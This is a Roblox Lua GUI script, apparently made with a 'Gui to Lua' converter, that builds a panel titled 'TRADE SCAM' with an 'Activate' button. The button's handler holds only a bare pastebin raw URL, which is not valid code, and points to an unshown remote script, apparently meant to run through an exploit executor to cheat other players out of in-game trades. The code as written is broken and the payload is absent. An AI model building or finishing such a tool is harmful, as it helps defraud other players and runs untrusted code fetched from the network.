-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local ImageLabel = Instance.new("ImageLabel")
local UICorner = Instance.new("UICorner")
local Frame_2 = Instance.new("Frame")
local UICorner_2 = Instance.new("UICorner")
local Frame_3 = Instance.new("Frame")
local UICorner_3 = Instance.new("UICorner")
local TextButton = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local Frame_4 = Instance.new("Frame")
local UICorner_5 = Instance.new("UICorner")
local Mail = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local UICorner_7 = Instance.new("UICorner")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.Position = UDim2.new(0.243098155, 0, 0.46790126, 0)
Frame.Size = UDim2.new(0, 495, 0, 313)
Frame.Active = true
Frame.Draggable = true 

ImageLabel.Parent = Frame
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.Position = UDim2.new(-0.00239300728, 0, -0.00186673831, 0)
ImageLabel.Size = UDim2.new(0, 496, 0, 316)
ImageLabel.Image = "http://www.roblox.com/asset/?id=10687882568"
ImageLabel.ImageColor3 = Color3.fromRGB(106, 18, 229)

UICorner.Parent = ImageLabel

Frame_2.Parent = ImageLabel
Frame_2.BackgroundColor3 = Color3.fromRGB(90, 15, 195)
Frame_2.Position = UDim2.new(0.0744978189, 0, 0.0897483826, 0)
Frame_2.Size = UDim2.new(0, 421, 0, 258)

UICorner_2.Parent = Frame_2

Frame_3.Parent = Frame_2
Frame_3.BackgroundColor3 = Color3.fromRGB(118, 20, 255)
Frame_3.Position = UDim2.new(0.0308788605, 0, 0.0310077518, 0)
Frame_3.Size = UDim2.new(0, 122, 0, 244)

UICorner_3.Parent = Frame_3

TextButton.Parent = Frame_3
TextButton.BackgroundColor3 = Color3.fromRGB(90, 15, 195)
TextButton.Position = UDim2.new(0.0819672123, 0, 0.0819672123, 0)
TextButton.Size = UDim2.new(0, 105, 0, 50)
TextButton.Font = Enum.Font.FredokaOne
TextButton.Text = "MENU"
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextScaled = true
TextButton.TextSize = 14.000
TextButton.TextWrapped = true

UICorner_4.Parent = TextButton

Frame_4.Parent = Frame_2
Frame_4.BackgroundColor3 = Color3.fromRGB(118, 20, 255)
Frame_4.Position = UDim2.new(0.349168658, 0, 0.0310077518, 0)
Frame_4.Size = UDim2.new(0, 260, 0, 244)

UICorner_5.Parent = Frame_4

Mail.Name = "Mail"
Mail.Parent = Frame_4
Mail.BackgroundColor3 = Color3.fromRGB(90, 15, 195)
Mail.Position = UDim2.new(0.207692325, 0, 0.196721315, 0)
Mail.Size = UDim2.new(0, 152, 0, 50)
Mail.Font = Enum.Font.FredokaOne
Mail.Text = "Activate"
Mail.TextColor3 = Color3.fromRGB(255, 255, 255)
Mail.TextScaled = true
Mail.TextSize = 14.000
Mail.TextWrapped = true
Mail.MouseButton1Down:connect(function()
	https://pastebin.com/raw/QiNLTwss
end)

UICorner_6.Parent = Mail

TextLabel.Parent = Frame_4
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0.173076928, 0, 0.676229477, 0)
TextLabel.Size = UDim2.new(0, 169, 0, 35)
TextLabel.Font = Enum.Font.LuckiestGuy
TextLabel.Text = "doesnt work in plaza /hardcore "
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

TextLabel_2.Parent = Frame_2
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.178147271, 0, -0.193798453, 0)
TextLabel_2.Size = UDim2.new(0, 271, 0, 50)
TextLabel_2.Font = Enum.Font.LuckiestGuy
TextLabel_2.Text = "TRADE SCAM"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextStrokeTransparency = 2.000
TextLabel_2.TextWrapped = true

UICorner_7.Parent = Frame
